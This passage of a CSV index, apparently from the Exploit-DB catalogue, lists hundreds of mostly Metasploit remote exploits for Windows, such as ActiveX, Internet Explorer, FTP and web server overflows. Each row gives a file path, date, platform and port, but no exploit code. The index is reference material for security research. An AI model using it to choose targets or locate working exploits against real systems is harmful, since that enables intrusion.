(Metasploit)",2010-07-20,Metasploit,remote,windows, +16538,exploits/windows/remote/16538.rb,"McAfee Visual Trace - ActiveX Control Buffer Overflow (Metasploit)",2010-09-20,Metasploit,remote,windows, +16539,exploits/windows/remote/16539.rb,"Creative Software AutoUpdate Engine - ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,remote,windows, +16540,exploits/windows/remote/16540.rb,"Zenturi ProgramChecker - ActiveX Control Arbitrary File Download (Metasploit)",2010-11-24,Metasploit,remote,windows, +16541,exploits/windows/remote/16541.rb,"Microsoft Internet Explorer - 'Winhlp32.exe' MsgBox Code Execution (MS10-023) (Metasploit)",2010-09-28,Metasploit,remote,windows, +16542,exploits/windows/remote/16542.rb,"Microsoft OWC Spreadsheet - HTMLURL Buffer Overflow (MS09-043) (Metasploit)",2010-04-30,Metasploit,remote,windows, +16543,exploits/windows/remote/16543.rb,"Novell iPrint Client - ActiveX Control Date/Time Buffer Overflow (Metasploit)",2010-05-09,Metasploit,remote,windows, +16544,exploits/windows/remote/16544.rb,"SonicWALL Aventail - 'epi.dll' AuthCredential Format String (Metasploit)",2010-09-20,Metasploit,remote,windows, +16545,exploits/windows/remote/16545.rb,"Microsoft Help Center - Cross-Site Scripting / Command Execution (MS10-042) (Metasploit)",2010-09-20,Metasploit,remote,windows, +16547,exploits/windows/remote/16547.rb,"Microsoft Internet Explorer - Style getElementsByTagName Memory Corruption (MS09-072) (Metasploit)",2010-07-12,Metasploit,remote,windows, +16548,exploits/windows/remote/16548.rb,"Amaya Browser 11.0 - bdo tag Overflow (Metasploit)",2010-05-09,Metasploit,remote,windows, +16549,exploits/windows/remote/16549.rb,"Microsoft Internet Explorer - isComponentInstalled Overflow (Metasploit)",2010-05-09,Metasploit,remote,windows, +16550,exploits/windows/remote/16550.rb,"WebDAV - Application DLL Hijacker (Metasploit)",2010-09-24,Metasploit,remote,windows, +16551,exploits/windows/remote/16551.rb,"Microsoft Internet Explorer - CSS SetUserClip Memory Corruption (MS10-090) (Metasploit)",2011-01-20,Metasploit,remote,windows, +16552,exploits/windows/remote/16552.rb,"Husdawg_ LLC. System Requirements Lab - ActiveX Unsafe Method (Metasploit)",2010-09-20,Metasploit,remote,windows, +16553,exploits/windows/remote/16553.rb,"BaoFeng Storm - 'mps.dll' ActiveX OnBeforeVideoDownload Buffer Overflow (Metasploit)",2010-04-30,Metasploit,remote,windows, +16554,exploits/windows/remote/16554.rb,"America Online ICQ - ActiveX Control Arbitrary File Download and Execute (Metasploit)",2010-11-24,Metasploit,remote,windows, +16555,exploits/windows/remote/16555.rb,"Microsoft Internet Explorer 7 - CFunctionPointer Uninitialized Memory Corruption (MS09-002) (Metasploit)",2010-07-12,Metasploit,remote,windows, +16557,exploits/windows/remote/16557.rb,"Ask.com Toolbar - 'askBar.dll' ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,remote,windows, +16558,exploits/windows/remote/16558.rb,"Apple QuickTime 7.6.6 - Invalid SMIL URI Buffer Overflow (Metasploit)",2011-01-08,Metasploit,remote,windows, +16559,exploits/windows/remote/16559.rb,"Roxio CinePlayer - ActiveX Control Buffer Overflow (Metasploit)",2010-04-30,Metasploit,remote,windows, +16560,exploits/windows/remote/16560.rb,"Autodesk IDrop - ActiveX Control Heap Memory Corruption (Metasploit)",2010-04-30,Metasploit,remote,windows, +16561,exploits/windows/remote/16561.rb,"Microsoft Internet Explorer - COM CreateObject Code Execution (MS06-014/MS06-073) (Metasploit)",2010-09-20,Metasploit,remote,windows, +16563,exploits/windows/remote/16563.rb,"Tumbleweed SecureTransport FileTransfer - 'vcst_eu.dll' ActiveX Control Buffer Overflow (Metasploit)",2010-06-15,Metasploit,remote,windows, +16564,exploits/windows/remote/16564.rb,"Microsoft Internet Explorer - WebViewFolderIcon setSlice() Overflow (MS06-057) (Metasploit) (2)",2010-07-03,Metasploit,remote,windows, +16565,exploits/windows/remote/16565.rb,"RKD Software BarCode ActiveX Control 'BarCodeAx.dll' 4.9 - Remote Stack Buffer Overflow (Metasploit)",2010-05-09,Metasploit,remote,windows, +16566,exploits/windows/remote/16566.rb,"CommuniCrypt Mail 1.16 - SMTP ActiveX Stack Buffer Overflow (Metasploit)",2010-07-26,Metasploit,remote,windows, +16567,exploits/windows/remote/16567.rb,"Microsoft Internet Explorer - Tabular Data Control ActiveX Memory Corruption (MS10-018) (Metasploit)",2010-04-30,Metasploit,remote,windows, +16568,exploits/windows/remote/16568.rb,"Juniper SSL-VPN IVE - 'JuniperSetupDLL.dll' ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,remote,windows, +16569,exploits/windows/remote/16569.rb,"Orbit Downloader - Connecting Log Creation Buffer Overflow (Metasploit)",2010-05-09,Metasploit,remote,windows, +16570,exploits/windows/remote/16570.rb,"AwingSoft Winds3D Player 3.5 - SceneURL Download and Execute (Metasploit)",2010-09-20,Metasploit,remote,windows, +16571,exploits/windows/remote/16571.rb,"iseemedia / Roxio / MGI Software LPViewer - ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,remote,windows, +16572,exploits/windows/remote/16572.rb,"GOM Player - ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,remote,windows, +16573,exploits/windows/remote/16573.rb,"Macrovision Installshield Update Service - Remote Buffer Overflow (Metasploit)",2010-05-09,Metasploit,remote,windows, +16574,exploits/windows/remote/16574.rb,"Microsoft Windows - Shell LNK Code Execution (MS10-046) (Metasploit)",2010-09-21,Metasploit,remote,windows, +16575,exploits/windows/remote/16575.rb,"SAP AG SAPgui EAI WebViewer3D - Remote Buffer Overflow (Metasploit)",2010-05-09,Metasploit,remote,windows, +16576,exploits/windows/remote/16576.rb,"Persits XUpload - ActiveX AddFile Buffer Overflow (Metasploit)",2010-05-09,Metasploit,remote,windows, +16577,exploits/windows/remote/16577.rb,"CA BrightStor ARCserve Backup - 'AddColumn()' ActiveX Buffer Overflow (Metasploit)",2010-06-15,Metasploit,remote,windows, +16578,exploits/windows/remote/16578.rb,"Microsoft Internet Explorer - 'createTextRange()' Code Execution (MS06-013) (Metasploit)",2010-09-20,Metasploit,remote,windows, +16579,exploits/windows/remote/16579.rb,"Oracle Document Capture 10g - ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,remote,windows, +16580,exploits/windows/remote/16580.rb,"HP Mercury Quality Center - ActiveX Control ProgColor Buffer Overflow (Metasploit)",2010-04-30,Metasploit,remote,windows, +16581,exploits/windows/remote/16581.rb,"Microsoft Internet Explorer - Object Type (MS03-020) (Metasploit)",2010-08-25,Metasploit,remote,windows, +16582,exploits/windows/remote/16582.rb,"Symantec BackupExec Calendar Control - Remote Buffer Overflow (Metasploit)",2010-05-09,Metasploit,remote,windows, +16583,exploits/windows/remote/16583.rb,"Microsoft Internet Explorer - Data Binding Memory Corruption (MS08-078) (Metasploit)",2010-09-20,Metasploit,remote,windows, +16584,exploits/windows/remote/16584.rb,"RealPlayer - 'rmoc3260.dll' ActiveX Control Heap Corruption (Metasploit)",2010-06-15,Metasploit,remote,windows, +16585,exploits/windows/remote/16585.rb,"Sun Java - Web Start Plugin Command Line Argument Injection (Metasploit)",2010-09-21,Metasploit,remote,windows, +16586,exploits/windows/remote/16586.rb,"RealNetworks RealPlayer - '.SMIL' Remote Buffer Overflow (Metasploit)",2010-05-09,Metasploit,remote,windows, +16587,exploits/windows/remote/16587.rb,"Sun Java - Runtime New Plugin docbase Buffer Overflow (Metasploit)",2011-01-08,Metasploit,remote,windows, +16588,exploits/windows/remote/16588.rb,"HP LoadRunner 9.0 - ActiveX AddFolder Buffer Overflow (Metasploit)",2010-05-09,Metasploit,remote,windows, +16590,exploits/windows/remote/16590.rb,"Microsoft Internet Explorer - DHTML Behaviour Use-After-Free (MS10-018) (Metasploit)",2010-12-14,Metasploit,remote,windows, +16591,exploits/windows/remote/16591.rb,"AOL Radio AmpX - ActiveX Control 'ConvertFile()' Remote Buffer Overflow (Metasploit)",2010-04-30,Metasploit,remote,windows, +16592,exploits/windows/remote/16592.rb,"SoftArtisans XFile FileManager - ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,remote,windows, +16594,exploits/windows/remote/16594.rb,"Adobe Shockwave Player - rcsL Memory Corruption (Metasploit)",2010-10-22,Metasploit,remote,windows, +16595,exploits/windows/remote/16595.rb,"Norton AntiSpam 2004 - SymSpamHelper ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,remote,windows, +16597,exploits/windows/remote/16597.rb,"Microsoft Internet Explorer - 'VML' Fill Method Code Execution (MS06-055) (Metasploit)",2010-07-03,Metasploit,remote,windows, +16598,exploits/windows/remote/16598.rb,"Persits XUpload - ActiveX MakeHttpRequest Directory Traversal (Metasploit)",2010-11-11,Metasploit,remote,windows, +16599,exploits/windows/remote/16599.rb,"Microsoft Internet Explorer - 'Aurora' Memory Corruption (MS10-002) (Metasploit)",2010-07-12,Metasploit,remote,windows, +16600,exploits/windows/remote/16600.rb,"Symantec Altiris Deployment Solution - ActiveX Control Arbitrary File Download and Execute (Metasploit)",2010-11-24,Metasploit,remote,windows, +16601,exploits/windows/remote/16601.rb,"FlipViewer FViewerLoading - ActiveX Control Buffer Overflow (Metasploit)",2010-06-15,Metasploit,remote,windows, +16602,exploits/windows/remote/16602.rb,"Macrovision Installshield Update Service - ActiveX Unsafe Method (Metasploit)",2010-09-20,Metasploit,remote,windows, +16603,exploits/windows/remote/16603.rb,"NCTAudioFile2 2.x - ActiveX Control 'SetFormatLikeSample()' Remote Buffer Overflow (Metasploit)",2010-07-03,Metasploit,remote,windows, +16604,exploits/windows/remote/16604.rb,"Cisco WebEx Meeting Manager UCF - 'atucfobj.dll' ActiveX NewObject Method Buffer Overflow (Metasploit)",2010-09-20,Metasploit,remote,windows, +16605,exploits/windows/remote/16605.rb,"Snapshot Viewer for Microsoft Access - ActiveX Control Arbitrary File Download (Metasploit)",2010-09-20,Metasploit,remote,windows, +16607,exploits/windows/remote/16607.rb,"WinZip FileView - 'WZFILEVIEW.FileViewCtrl.61' ActiveX Buffer Overflow (Metasploit)",2010-04-30,Metasploit,remote,windows, +16608,exploits/windows/remote/16608.rb,"Microsoft Whale Intelligent Application Gateway - ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,remote,windows, +16609,exploits/windows/remote/16609.rb,"Electronic Arts SnoopyCtrl - ActiveX Control Buffer Overflow (Metasploit)",2010-11-11,Metasploit,remote,windows, +16610,exploits/windows/remote/16610.rb,"Symantec Norton Internet Security 2004 - ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,remote,windows, +16611,exploits/windows/remote/16611.rb,"Winamp Ultravox Streaming Metadata 'in_mp3.dll' - Remote Buffer Overflow (Metasploit)",2010-05-09,Metasploit,remote,windows, +16612,exploits/windows/remote/16612.rb,"Microsoft Windows XP/Vista/2003 - Metafile Escape() SetAbortProc Code Execution (MS06-001) (Metasploit)",2010-09-20,Metasploit,remote,windows, +16613,exploits/windows/remote/16613.rb,"Symantec ConsoleUtilities - ActiveX Control Buffer Overflow (Metasploit)",2010-11-11,Metasploit,remote,windows, +16616,exploits/windows/remote/16616.rb,"SonicWALL SSL-VPN - NetExtender ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,remote,windows, +16630,exploits/windows/remote/16630.rb,"CA eTrust PestPatrol - ActiveX Control Buffer Overflow (Metasploit)",2010-11-11,Metasploit,remote,windows, +16635,exploits/windows/remote/16635.rb,"activePDF WebGrabber - ActiveX Control Buffer Overflow (Metasploit)",2010-11-11,Metasploit,remote,windows, +16638,exploits/windows/remote/16638.rb,"DjVu - 'DjVu_ActiveX_MSOffice.dll' ActiveX Component Buffer Overflow (Metasploit)",2010-09-25,Metasploit,remote,windows, +16639,exploits/windows/remote/16639.rb,"McAfee Remediation Client - ActiveX Control Buffer Overflow (Metasploit)",2010-11-11,Metasploit,remote,windows, +16641,exploits/windows/remote/16641.rb,"SasCam Webcam Server 2.6.5 - 'Get()' Method Buffer Overflow (Metasploit)",2010-09-25,Metasploit,remote,windows, +16647,exploits/windows/remote/16647.rb,"EMC ApplicationXtender (KeyWorks) - ActiveX Control Buffer Overflow (Metasploit)",2010-11-11,Metasploit,remote,windows, +16649,exploits/windows/remote/16649.rb,"Microsoft Works 7 - 'WkImgSrv.dll' WKsPictureInterface() ActiveX (Metasploit)",2010-09-25,Metasploit,remote,windows, +41783,exploits/multiple/remote/41783.txt,"Apache Tomcat 6/7/8/9 - Information Disclosure",2017-04-04,justpentest,remote,multiple, +16685,exploits/windows/remote/16685.rb,"MOXA MediaDBPlayback - ActiveX Control Buffer Overflow (Metasploit)",2010-11-05,Metasploit,remote,windows, +16690,exploits/windows/remote/16690.rb,"QBik WinGate WWW Proxy Server - URL Processing Overflow (Metasploit)",2010-09-20,Metasploit,remote,windows,80 +16691,exploits/windows/remote/16691.rb,"Blue Coat WinProxy - Host Header Overflow (Metasploit)",2010-07-12,Metasploit,remote,windows,80 +16692,exploits/windows/remote/16692.rb,"Proxy-Pro Professional GateKeeper 4.7 - GET Overflow (Metasploit)",2010-09-20,Metasploit,remote,windows,3128 +16693,exploits/windows/remote/16693.rb,"Unreal Tournament 2004 (Windows) - 'secure' Remote Overflow (Metasploit)",2010-09-20,Metasploit,remote,windows,7787 +16694,exploits/windows/remote/16694.rb,"Racer 0.5.3 Beta 5 - Remote Buffer Overflow (Metasploit)",2010-09-20,Metasploit,remote,windows,26000 +16695,exploits/windows/remote/16695.rb,"Medal of Honor Allied Assault - getinfo Stack Buffer Overflow (Metasploit)",2010-05-09,Metasploit,remote,windows,12203 +16696,exploits/windows/remote/16696.rb,"IBM Lotus Domino Sametime - 'STMux.exe' Remote Stack Buffer Overflow (Metasploit)",2010-05-09,Metasploit,remote,windows,1533 +16697,exploits/windows/remote/16697.rb,"IBM Lotus Domino Web Server - Accept-Language Stack Buffer Overflow (Metasploit)",2010-11-11,Metasploit,remote,windows,80 +16698,exploits/windows/remote/16698.rb,"Microsoft Windows - ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (SMTP) (MS07-017) (Metasploit)",2010-09-20,Metasploit,remote,windows, +16699,exploits/windows/remote/16699.rb,"Microsoft Outlook - 'ATTACH_BY_REF_RESOLVE' File Execution (MS10-045) (Metasploit)",2010-09-20,Metasploit,remote,windows, +16700,exploits/windows/remote/16700.rb,"Microsoft Outlook - 'ATTACH_BY_REF_ONLY' File Execution (MS10-045) (Metasploit)",2010-09-20,Metasploit,remote,windows, +16701,exploits/windows/remote/16701.rb,"MySQL yaSSL (Windows) - SSL Hello Message Buffer Overflow (Metasploit)",2010-05-09,Metasploit,remote,windows,3306 +16702,exploits/windows/remote/16702.rb,"KarjaSoft Sami FTP Server 2.0.2 - USER Remote Buffer Overflow (Metasploit)",2010-04-30,Metasploit,remote,windows,21 +16703,exploits/windows/remote/16703.rb,"GlobalScape Secure FTP Server - Input Overflow (Metasploit)",2010-10-05,Metasploit,remote,windows, +16704,exploits/windows/remote/16704.rb,"LeapFTP 3.0.1 - Remote Stack Buffer Overflow (Metasploit)",2010-11-14,Metasploit,remote,windows, +16705,exploits/windows/remote/16705.rb,"Seagull FTP 3.3 build 409 - Remote Stack Buffer Overflow (Metasploit)",2010-11-14,Metasploit,remote,windows, +16706,exploits/windows/remote/16706.rb,"War-FTPD 1.65 - Password Overflow (Metasploit)",2010-07-03,Metasploit,remote,windows, +16707,exploits/windows/remote/16707.rb,"freeFTPd 1.0 - 'Username' Remote Overflow (Metasploit)",2010-07-03,Metasploit,remote,windows, +16708,exploits/windows/remote/16708.rb,"LeapWare LeapFTP 2.7.3.600 - PASV Reply Client Overflow (Metasploit)",2010-04-30,Metasploit,remote,windows, +16709,exploits/windows/remote/16709.rb,"ProFTP 2.9 - Banner Remote Buffer Overflow (Metasploit)",2010-07-03,Metasploit,remote,windows, +16710,exploits/windows/remote/16710.rb,"Trellian FTP Client 3.01 - PASV Remote Buffer Overflow (Metasploit)",2010-06-15,Metasploit,remote,windows, +16711,exploits/windows/remote/16711.rb,"EasyFTP Server 1.7.0.11 - MKD Command Stack Buffer Overflow (Metasploit)",2010-07-27,Metasploit,remote,windows, +16712,exploits/windows/remote/16712.rb,"BolinTech DreamFTP Server 1.02 - Format String (Metasploit)",2010-06-22,Metasploit,remote,windows,21 +16713,exploits/windows/remote/16713.rb,"CesarFTP 0.99g - 'MKD' Remote Buffer Overflow (Metasploit)",2011-02-23,Metasploit,remote,windows, +16714,exploits/win_x86/remote/16714.rb,"Oracle 9i XDB (Windows x86) - FTP UNLOCK Overflow (Metasploit)",2010-10-05,Metasploit,remote,win_x86,2100 +16715,exploits/windows/remote/16715.rb,"RhinoSoft Serv-U FTPd Server - MDTM Overflow (Metasploit)",2010-09-20,Metasploit,remote,windows,21 +16716,exploits/windows/remote/16716.rb,"Odin Secure FTP 4.1 - 'LIST' Remote Stack Buffer Overflow (Metasploit)",2010-11-14,Metasploit,remote,windows, +16717,exploits/windows/remote/16717.rb,"Ipswitch WS_FTP Server 5.05 - XMD5 Overflow (Metasploit)",2010-04-30,Metasploit,remote,windows, +16718,exploits/windows/remote/16718.rb,"Xlink FTP Server - Remote Buffer Overflow (Metasploit)",2010-11-11,Metasploit,remote,windows, +16719,exploits/windows/remote/16719.rb,"Ipswitch WS_FTP Server 5.03 - MKD Overflow (Metasploit)",2010-10-05,Metasploit,remote,windows,21 +16720,exploits/windows/remote/16720.rb,"FTP Synchronizer Professional 4.0.73.274 - Remote Stack Buffer Overflow (Metasploit)",2010-11-14,Metasploit,remote,windows, +16721,exploits/windows/remote/16721.rb,"FileWrangler 5.30 - Remote Stack Buffer Overflow (Metasploit)",2010-11-14,Metasploit,remote,windows, +16722,exploits/windows/remote/16722.rb,"Xlink FTP Client - Remote Buffer Overflow (Metasploit)",2010-11-11,Metasploit,remote,windows, +16723,exploits/windows/remote/16723.rb,"Vermillion FTP Daemon - PORT Command Memory Corruption (Metasploit)",2010-09-20,Metasploit,remote,windows, +16724,exploits/windows/remote/16724.rb,"War-FTPD 1.65 - 'Username' Remote Overflow (Metasploit)",2010-07-03,Metasploit,remote,windows, +16725,exploits/windows/remote/16725.rb,"FTPGetter Standard 3.55.0.05 - Remote Stack Buffer Overflow (PWD) (Metasploit)",2010-11-14,Metasploit,remote,windows, +16726,exploits/windows/remote/16726.rb,"FTPPad 1.2.0 - Remote Stack Buffer Overflow (Metasploit)",2010-11-14,Metasploit,remote,windows, +16727,exploits/windows/remote/16727.rb,"Sasser Worm avserve - FTP PORT Buffer Overflow (Metasploit)",2010-04-30,Metasploit,remote,windows,5554 +16728,exploits/windows/remote/16728.rb,"Gekko Manager FTP Client - Remote Stack Buffer Overflow (Metasploit)",2010-11-14,Metasploit,remote,windows, +16729,exploits/windows/remote/16729.rb,"SlimFTPd - 'LIST' Concatenation Overflow (Metasploit)",2010-10-05,Metasploit,remote,windows, +16730,exploits/windows/remote/16730.rb,"3Com 3CDaemon 2.0 FTP Server - 'Username' Remote Overflow (Metasploit)",2010-09-20,Metasploit,remote,windows, +16731,exploits/win_x86/remote/16731.rb,"Oracle 9i XDB (Windows x86) - FTP PASS Overflow (Metasploit)",2010-04-30,Metasploit,remote,win_x86, +16732,exploits/windows/remote/16732.rb,"httpdx - 'tolog()' Format String (Metasploit) (1)",2010-08-25,Metasploit,remote,windows, +16733,exploits/windows/remote/16733.rb,"FileCOPA FTP Server (Pre 18 Jul Version) - 'LIST' Remote Buffer Overflow (Metasploit)",2010-04-30,Metasploit,remote,windows,21 +16734,exploits/windows/remote/16734.rb,"EasyFTP Server 1.7.0.11 - LIST Command Stack Buffer Overflow (Metasploit)",2010-08-03,Metasploit,remote,windows, +16735,exploits/windows/remote/16735.rb,"NetTerm NetFTPD - 'USER' Remote Buffer Overflow (Metasploit)",2010-10-05,Metasploit,remote,windows, +16736,exploits/windows/remote/16736.rb,"FTPShell 5.1 - Remote Stack Buffer Overflow (Metasploit)",2010-11-14,Metasploit,remote,windows, +16737,exploits/windows/remote/16737.rb,"EasyFTP Server 1.7.0.11 - CWD Command Stack Buffer Overflow (Metasploit)",2010-04-30,Metasploit,remote,windows, +16738,exploits/win_x86/remote/16738.rb,"AASync 2.2.1.0 (Windows x86) - Remote Stack Buffer Overflow 'LIST' (Metasploit)",2010-11-14,Metasploit,remote,win_x86, +16739,exploits/windows/remote/16739.rb,"Xftp FTP Client 3.0 - PWD Remote Buffer Overflow (Metasploit)",2010-04-30,Metasploit,remote,windows,21 +16740,exploits/windows/remote/16740.rb,"Microsoft IIS FTP Server - NLST Response Overflow (MS09-053) (Metasploit)",2010-11-12,Metasploit,remote,windows,21 +16741,exploits/windows/remote/16741.rb,"Texas Imperial Software WFTPD 3.23 - SIZE Overflow (Metasploit)",2010-06-22,Metasploit,remote,windows, +16742,exploits/windows/remote/16742.rb,"Easy File Sharing FTP Server 2.0 - PASS Overflow (Metasploit)",2010-05-09,Metasploit,remote,windows, +16743,exploits/win_x86/remote/16743.rb,"32bit FTP Client - Remote Stack Buffer Overflow (Metasploit)",2010-11-14,Metasploit,remote,win_x86, +16744,exploits/windows/remote/16744.rb,"Computer Associates License Client - GETCONFIG Overflow (Metasploit)",2010-09-20,Metasploit,remote,windows,10203 +16745,exploits/windows/remote/16745.rb,"Computer Associates License Server - GETCONFIG Overflow (Metasploit)",2010-09-20,Metasploit,remote,windows,10202 +16746,exploits/windows/remote/16746.rb,"Sentinel LM - UDP Buffer Overflow (Metasploit)",2010-05-09,Metasploit,remote,windows,5093 +16747,exploits/windows/remote/16747.rb,"Microsoft Message Queueing Service - Path Overflow (MS05-017) (Metasploit)",2010-05-09,Metasploit,remote,windows,2103 +16748,exploits/windows/remote/16748.rb,"Microsoft DNS RPC Service - 'extractQuotedChar()' TCP Overflow (MS07-029) (Metasploit)",2010-07-25,Metasploit,remote,windows, +16749,exploits/windows/remote/16749.rb,"Microsoft RPC DCOM Interface - Remote Overflow (MS03-026) (Metasploit)",2011-01-11,Metasploit,remote,windows, +16750,exploits/windows/remote/16750.rb,"Microsoft Message Queueing Service - DNS Name Path Overflow (MS07-065) (Metasploit)",2010-07-25,Metasploit,remote,windows, +16751,exploits/win_x86/remote/16751.rb,"SHOUTcast DNAS/Win32 1.9.4 - File Request Format String Overflow (Metasploit)",2010-04-30,Metasploit,remote,win_x86, +16752,exploits/windows/remote/16752.rb,"Apache mod_rewrite - LDAP protocol Buffer Overflow (Metasploit)",2010-02-15,Metasploit,remote,windows,80 +16753,exploits/windows/remote/16753.rb,"Xitami Web Server 2.5c2 - If-Modified-Since Overflow (Metasploit)",2010-08-25,Metasploit,remote,windows,80 +16754,exploits/windows/remote/16754.rb,"MiniShare 1.4.1 - Remote Buffer Overflow (Metasploit)",2010-05-09,Metasploit,remote,windows,80 +16755,exploits/windows/remote/16755.rb,"Novell iManager - 'getMultiPartParameters' Arbitrary File Upload (Metasploit)",2010-10-19,Metasploit,remote,windows,8080 +16756,exploits/windows/remote/16756.rb,"Sambar Server 6 - Search Results Buffer Overflow (Metasploit)",2010-02-13,Metasploit,remote,windows,80 +16757,exploits/windows/remote/16757.rb,"Novell Messenger Server 2.0 - Accept-Language Overflow (Metasploit)",2010-09-20,Metasploit,remote,windows,8300 +16758,exploits/windows/remote/16758.rb,"SAP DB 7.4 - WebTools Buffer Overflow (Metasploit)",2010-07-16,Metasploit,remote,windows,9999 +16759,exploits/win_x86/remote/16759.rb,"SHTTPD 1.34 (Windows x86) - URI-Encoded POST Request Overflow (Metasploit)",2010-05-09,Metasploit,remote,win_x86, +16760,exploits/windows/remote/16760.rb,"Private Wire Gateway - Remote Buffer Overflow (Metasploit)",2010-04-30,Metasploit,remote,windows,80 +16761,exploits/windows/remote/16761.rb,"BadBlue 2.5 - 'ext.dll' Remote Buffer Overflow (Metasploit)",2010-07-07,Metasploit,remote,windows,80 +16762,exploits/windows/remote/16762.rb,"BEA WebLogic - JSESSIONID Cookie Value Overflow (Metasploit)",2010-07-03,Metasploit,remote,windows,80 +16763,exploits/win_x86/remote/16763.rb,"Icecast 2.0.1 (Windows x86) - Header Overwrite (Metasploit)",2010-04-30,Metasploit,remote,win_x86,8000 +16764,exploits/windows/remote/16764.rb,"IBM Tivoli Storage Manager Express CAD Service - Remote Buffer Overflow (Metasploit) (2)",2010-05-09,Metasploit,remote,windows, +16765,exploits/windows/remote/16765.rb,"MaxDB WebDBM - 'Database' Remote Overflow (Metasploit)",2010-09-20,Metasploit,remote,windows,9999 +16766,exploits/windows/remote/16766.rb,"Sybase EAServer 5.2 - Remote Stack Buffer Overflow (Metasploit)",2010-06-22,Metasploit,remote,windows,8080 +16767,exploits/windows/remote/16767.rb,"IA WebMail Server 3.x - Remote Buffer Overflow (Metasploit)",2010-05-09,Metasploit,remote,windows,80 +16768,exploits/windows/remote/16768.rb,"Trend Micro OfficeScan - Remote Stack Buffer Overflow (Metasploit)",2010-05-09,Metasploit,remote,windows, +16769,exploits/windows/remote/16769.rb,"eDirectory 8.7.3 - iMonitor Remote Stack Buffer Overflow (Metasploit)",2010-07-13,Metasploit,remote,windows,8008 +16770,exploits/windows/remote/16770.rb,"Savant Web Server 3.1 - Remote Overflow (Metasploit)",2010-10-04,Metasploit,remote,windows, +16771,exploits/windows/remote/16771.rb,"EasyFTP Server 1.7.0.11 - list.html path Stack Buffer Overflow (Metasploit)",2010-08-17,Metasploit,remote,windows,8080 +16772,exploits/windows/remote/16772.rb,"EFS Easy Chat Server - Authentication Request Handling Buffer Overflow (Metasploit)",2010-08-06,Metasploit,remote,windows,80 +16773,exploits/windows/remote/16773.rb,"Novell eDirectory NDS Server - Host Header Overflow (Metasploit)",2010-05-09,Metasploit,remote,windows,8028 +16774,exploits/windows/remote/16774.rb,"HP OpenView Network Node Manager (OV NNM) 7.53/7.51 - 'OVAS.exe' Unauthenticated Stack Buffer Overflow (Metasploit)",2010-10-12,Metasploit,remote,windows, +16775,exploits/windows/remote/16775.rb,"RhinoSoft Serv-U FTP Server - Session Cookie Buffer Overflow (Metasploit)",2010-03-10,Metasploit,remote,windows, +16776,exploits/windows/remote/16776.rb,"Alt-N WebAdmin - USER Buffer Overflow (Metasploit)",2010-02-15,Metasploit,remote,windows, +16777,exploits/windows/remote/16777.rb,"Free Download Manager 2.5 Build 758 - Remote Control Server Buffer Overflow (Metasploit)",2010-07-13,Metasploit,remote,windows,80 +16778,exploits/windows/remote/16778.rb,"Race River Integard Home/Pro - LoginAdmin Password Stack Buffer Overflow (Metasploit)",2010-12-15,Metasploit,remote,windows,18881 +16779,exploits/windows/remote/16779.rb,"Now SMS/Mms Gateway - Remote Buffer Overflow (Metasploit)",2010-05-09,Metasploit,remote,windows,8800 +16780,exploits/cgi/remote/16780.rb,"HP OpenView Network Node Manager (OV NNM) - 'Snmp.exe' CGI Buffer Overflow (Metasploit)",2010-11-11,Metasploit,remote,cgi, +16781,exploits/windows/remote/16781.rb,"MailEnable - Authorisation Header Buffer Overflow (Metasploit)",2010-07-07,Metasploit,remote,windows, +16782,exploits/win_x86/remote/16782.rb,"Apache (Windows x86) - Chunked Encoding (Metasploit)",2010-07-07,Metasploit,remote,win_x86, +16783,exploits/win_x86/remote/16783.rb,"McAfee ePolicy Orchestrator / ProtectionPilot - Remote Overflow (Metasploit)",2010-09-20,Metasploit,remote,win_x86, +16784,exploits/multiple/remote/16784.rb,"Novell ZENworks Configuration Management 10.2.0 - Remote Execution (Metasploit)",2010-11-22,Metasploit,remote,multiple,80 +16785,exploits/windows/remote/16785.rb,"Hewlett-Packard (HP) Power Manager Administration - Remote Buffer Overflow (Metasploit)",2010-11-24,Metasploit,remote,windows,80 +16786,exploits/win_x86/remote/16786.rb,"PeerCast 0.1216 (Windows x86) - URL Handling Buffer Overflow (Metasploit)",2010-09-20,Metasploit,remote,win_x86,7144 +16787,exploits/windows/remote/16787.rb,"IPSwitch WhatsUp Gold 8.03 - Remote Buffer Overflow (Metasploit)",2010-07-14,Metasploit,remote,windows, +16789,exploits/multiple/remote/16789.rb,"Adobe RoboHelp Server 8 - Arbitrary File Upload / Execution (Metasploit)",2010-11-24,Metasploit,remote,multiple,8080 +16791,exploits/windows/remote/16791.rb,"MaxDB WebDBM - GET Buffer Overflow (Metasploit)",2010-05-09,Metasploit,remote,windows,9999 +16792,exploits/windows/remote/16792.rb,"HP OpenView Network Node Manager (OV NNM) - 'OvWebHelp.exe' CGI Buffer Overflow (Metasploit)",2010-11-11,Metasploit,remote,windows, +16793,exploits/windows/remote/16793.rb,"Amlibweb NetOpacs - 'webquery.dll' Remote Stack Buffer Overflow (Metasploit)",2010-11-14,Metasploit,remote,windows,80 +16794,exploits/windows/remote/16794.rb,"httpdx - 'tolog()' Format String (Metasploit) (2)",2010-08-25,Metasploit,remote,windows,80 +16795,exploits/cgi/remote/16795.rb,"HP OpenView Network Node Manager (OV NNM) - 'Toolbar.exe' CGI Buffer Overflow (Metasploit)",2010-05-09,Metasploit,remote,cgi, +16796,exploits/windows/remote/16796.rb,"BEA Weblogic - Transfer-Encoding Buffer Overflow (Metasploit)",2010-07-08,Metasploit,remote,windows,80 +16797,exploits/windows/remote/16797.rb,"HP OpenView Network Node Manager (OV NNM) - 'ovalarm.exe' CGI Buffer Overflow (Metasploit)",2010-11-11,Metasploit,remote,windows, +16798,exploits/windows/remote/16798.rb,"Apache Tomcat mod_jk 1.2.20 - Remote Buffer Overflow (Metasploit)",2010-07-25,Metasploit,remote,windows, +16799,exploits/windows/remote/16799.rb,"httpdx - 'h_handlepeer()' Remote Buffer Overflow (Metasploit)",2010-07-26,Metasploit,remote,windows, +16800,exploits/windows/remote/16800.rb,"Streamcast 0.9.75 - HTTP User-Agent Buffer Overflow 